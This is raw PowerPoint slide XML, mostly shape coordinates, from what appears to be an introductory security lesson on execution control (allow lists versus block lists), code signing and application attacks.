                    <a:pt x="122428" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122428" y="1490471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="1490471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124216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856994" y="4025645"/>
              <a:ext cx="12544425" cy="1490980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1490979">
                  <a:moveTo>
                    <a:pt x="0" y="122427"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9628" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122428" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="1490471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122428" y="1490471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122427"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050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052320" y="1756298"/>
            <a:ext cx="11800205" cy="3674745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="188595" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="752475">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1485"/>
              </a:spcBef>
            </a:pP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Execution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control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used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prevent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use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unauthorized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code.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="755015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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Executio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contr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ca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im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p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leme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as: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1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dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Allow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an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15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Blo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9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75">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>sts</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="106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  <a:tab pos="3887470" algn="l"/>
              </a:tabLst>
            </a:pP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Allow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list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control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indicates	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nothing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run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if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software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scripts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applications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are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not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approved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list.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264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Block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list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control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indicates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anything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not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prohibited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list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run.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778889" y="5975984"/>
            <a:ext cx="4338320" cy="487045"/>
            <a:chOff x="1778889" y="5975984"/>
            <a:chExt cx="4338320" cy="487045"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1788414" y="5985509"/>
              <a:ext cx="4319270" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="467995">
                  <a:moveTo>
                    <a:pt x="4241038" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77978" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312886" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296171" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271385" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4241038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788414" y="5985509"/>
              <a:ext cx="4319270" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="467995">
                  <a:moveTo>
                    <a:pt x="77978" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4241038" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271385" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296171" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312886" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77978" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="D5685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1971548" y="6020561"/>
            <a:ext cx="171132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Code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95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7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766697" y="6443853"/>
            <a:ext cx="12563475" cy="1099820"/>
            <a:chOff x="1766697" y="6443853"/>
            <a:chExt cx="12563475" cy="1099820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1776222" y="6453378"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455270" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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776222" y="6453378"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="D5685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971548" y="6816597"/>
            <a:ext cx="75946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Code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7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pro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v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authenticit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grity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code.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82003" y="306451"/>
            <a:ext cx="34905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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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8047" y="760476"/>
            <a:ext cx="4824984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145792" y="2546604"/>
            <a:ext cx="12070080" cy="1039494"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12070080" h="1039495">
                <a:moveTo>
                  <a:pt x="11896852" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="173227" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127191" y="6190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85814" y="23659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50752" y="50752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23659" y="85814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6190" y="127191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="173228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="866140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6190" y="912176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23659" y="953553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50752" y="988615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85814" y="1015708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127191" y="1033177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173227" y="1039368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11896852" y="1039368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11942888" y="1033177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11984265" y="1015708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12019327" y="988615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046420" y="953553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12063889" y="912176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12070079" y="866140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12070079" y="173228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12063889" y="127191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046420" y="85814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12019327" y="50752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11984265" y="23659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11942888" y="6190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11896852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705480" y="1933193"/>
            <a:ext cx="10945495" cy="14890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08305">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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application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attack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targets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vulnerability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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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application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software.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</a:pP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application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vulnerability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design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flaw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may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cause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application’s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security</a:t>
            </a:r>
            <a:endParaRPr sz="2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system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bypassed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cause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application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crash.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This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happens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due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to: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051693" y="3841813"/>
            <a:ext cx="4384675" cy="3266440"/>
            <a:chOff x="6051693" y="3841813"/>
            <a:chExt cx="4384675" cy="3266440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6056455" y="3846576"/>
              <a:ext cx="4023360" cy="3256915"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4023359" h="3256915">
                  <a:moveTo>
                    <a:pt x="3588559" y="26924"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3618446" y="65229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3647250" y="104024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3674974" y="143288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3701618" y="183005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727185" y="223156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3751678" y="263722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3775098" y="304685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3797448" y="346026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3818730" y="387728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3838945" y="429773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858097" y="472141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3876187" y="514814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3893217" y="557774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3909190" y="601003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3924108" y="644482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3937972" y="688194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3950785" y="732119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3962549" y="776239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3973267" y="820537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3982939" y="864993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3991569" y="909589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3999159" y="954308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4005711" y="999130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011226" y="1044038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4015708" y="1089012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4019157" y="1134035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021577" y="1179089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4022970" y="1224155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4023337" y="1269214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4022681" y="1314248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021003" y="1359240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4018307" y="1404170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4014594" y="1449021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4009866" y="1493774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4004125" y="1538410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3997374" y="1582911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989615" y="1627260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3980850" y="1671437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3971081" y="1715425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3960309" y="1759204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948538" y="1802757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3935770" y="1846066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922006" y="1889111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3907249" y="1931875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3891500" y="1974339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874763" y="2016486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3857038" y="2058296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3838329" y="2099751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3818637" y="2140833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3797965" y="2181524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3776315" y="2221805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3753688" y="2261658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3730087" y="2301065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3705515" y="2340007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3679972" y="2378466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3653462" y="2416423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3625987" y="2453861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3597548" y="2490761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568148" y="2527104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3537788" y="2562872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3506472" y="2598048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3474201" y="2632612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3440978" y="2666546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3406804" y="2699833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3371681" y="2732453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3335613" y="2764388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3298600" y="2795620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260645" y="2826131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3222537" y="2855316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3183949" y="2883459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144900" y="2910562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105407" y="2936627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3065487" y="2961655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3025159" y="2985650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2984440" y="3008613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2943349" y="3030546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2901901" y="3051451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860116" y="3071330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2818011" y="3090185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775604" y="3108018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732912" y="3124832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2689953" y="3140628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646745" y="3155408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603306" y="3169174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2559653" y="3181928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515805" y="3193673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471778" y="3204410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2427590" y="3214142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383259" y="3222870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338804" y="3230597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2294241" y="3237324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249588" y="3243053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2204864" y="3247787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160085" y="3251528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115270" y="3254277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070435" y="3256037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2025600" y="3256809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1980781" y="3256597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1935997" y="3255400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891264" y="3253223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1846602" y="3250067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802027" y="3245933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1757557" y="3240824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713210" y="3234742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669003" y="3227689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1624955" y="3219667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581083" y="3210677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537405" y="3200723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493938" y="3189806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1450700" y="3177928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407709" y="3165090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1364983" y="3151296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322539" y="3136547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280395" y="3120846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238569" y="3104193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197079" y="3086592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155941" y="3068044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115175" y="3048551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074797" y="3028116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034825" y="3006740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995277" y="2984425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956172" y="2961173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917525" y="2936987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879356" y="2911869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841682" y="2885820"/>
                  </a:lnTo>
                  <a:lnTo>
